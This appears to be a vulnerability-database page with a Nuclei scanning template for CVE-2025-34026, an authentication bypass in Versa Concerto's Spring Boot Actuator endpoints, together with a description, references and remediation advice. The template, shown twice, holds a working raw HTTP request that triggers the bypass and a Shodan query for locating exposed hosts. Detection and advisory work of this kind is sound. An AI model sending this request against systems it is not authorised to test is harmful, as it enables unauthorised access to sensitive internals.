Versa Concerto Actuator Endpoint - Authentication Bypass

CVE-2025-34026

Verified

Description

An authentication bypass vulnerability affected the Spring Boot Actuator endpoints in Versa Concerto due to improper handling of the X-Real-Ip header.Attackers could access restricted endpoints by omitting this header.The issue allowed unauthorized access to sensitive functionality, highlighting the need for proper header validation.

Severity

Critical

Exploit Probability

50%

Affected Product

concerto

Published Date

May 21, 2025

Template Author

iamnoooob, rootxharsh, parthmalhotra

CVE-2025-34026.yaml

id: CVE-2025-34026

info:
  name: Versa Concerto Actuator Endpoint - Authentication Bypass
  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
  severity: critical
  description: |
    An authentication bypass vulnerability affected the Spring Boot Actuator endpoints in Versa Concerto due to improper handling of the X-Real-Ip header.Attackers could access restricted endpoints by omitting this header.The issue allowed unauthorized access to sensitive functionality, highlighting the need for proper header validation.
  impact: |
    Attackers can bypass authentication by omitting the X-Real-Ip header to access restricted Spring Boot Actuator endpoints, potentially exposing sensitive system information and functionality.
  remediation: |
    Upgrade to the latest Versa Concerto version that properly validates authentication for all Actuator endpoints regardless of header presence.
  reference:
    - https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/
    - https://security-portal.versa-networks.com/emailbulletins/6830f94328defa375486ff2e
    - https://www.cve.org/CVERecord?id=CVE-2025-34026
  classification:
    epss-score: 0.49989
    epss-percentile: 0.97728
    cpe: cpe:2.3:a:versa-networks:concerto:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: versa-networks
    product: concerto
    max-request: 1
    shodan-query: http.favicon.hash:-534530225
  tags: versa,concerto,actuator,auth-bypass,springboot,cve,cve2025,vkev,vuln,kev

http:
  - raw:
      - |
        GET /portalapi/actuator HTTP/1.1
        Host: {{Hostname}}
        Connection: X-Real-Ip

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - heapdump

      - type: word
        part: header
        words:
          - EECP-CSRF-TOKEN
# digest: 490a0046304402202e5e96e458159eaceec22b1474653a03ec06537d75834f2ab62795da6ad7064a02207d1aca9f2deace80ca6c9b79fed8385eaee07ec10baf9498e29f76df5fbbc41a:922c64590222798bb761d5b6d8e72950

9.5Severity

CVSS Metrics

References

https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/https://security-portal.versa-networks.com/emailbulletins/6830f94328defa375486ff2e https://www.cve.org/CVERecord?id=CVE-2025-34026

Remediation Steps

Upgrade to the latest Versa Concerto version that properly validates authentication for all Actuator endpoints regardless of header presence.

Description

id: CVE-2025-34026

info:
  name: Versa Concerto Actuator Endpoint - Authentication Bypass
  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
  severity: critical
  description: |
    An authentication bypass vulnerability affected the Spring Boot Actuator endpoints in Versa Concerto due to improper handling of the X-Real-Ip header.Attackers could access restricted endpoints by omitting this header.The issue allowed unauthorized access to sensitive functionality, highlighting the need for proper header validation.
  impact: |
    Attackers can bypass authentication by omitting the X-Real-Ip header to access restricted Spring Boot Actuator endpoints, potentially exposing sensitive system information and functionality.
  remediation: |
    Upgrade to the latest Versa Concerto version that properly validates authentication for all Actuator endpoints regardless of header presence.
  reference:
    - https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/
    - https://security-portal.versa-networks.com/emailbulletins/6830f94328defa375486ff2e
    - https://www.cve.org/CVERecord?id=CVE-2025-34026
  classification:
    epss-score: 0.49989
    epss-percentile: 0.97728
    cpe: cpe:2.3:a:versa-networks:concerto:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: versa-networks
    product: concerto
    max-request: 1
    shodan-query: http.favicon.hash:-534530225
  tags: versa,concerto,actuator,auth-bypass,springboot,cve,cve2025,vkev,vuln,kev

http:
  - raw:
      - |
        GET /portalapi/actuator HTTP/1.1
        Host: {{Hostname}}
        Connection: X-Real-Ip

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - heapdump

      - type: word
        part: header
        words:
          - EECP-CSRF-TOKEN
# digest: 490a0046304402202e5e96e458159eaceec22b1474653a03ec06537d75834f2ab62795da6ad7064a02207d1aca9f2deace80ca6c9b79fed8385eaee07ec10baf9498e29f76df5fbbc41a:922c64590222798bb761d5b6d8e72950

Versa Concerto Actuator Endpoint - Authentication Bypass

Description

Severity

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Versa Concerto Actuator Endpoint - Authentication Bypass

Description

Severity

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps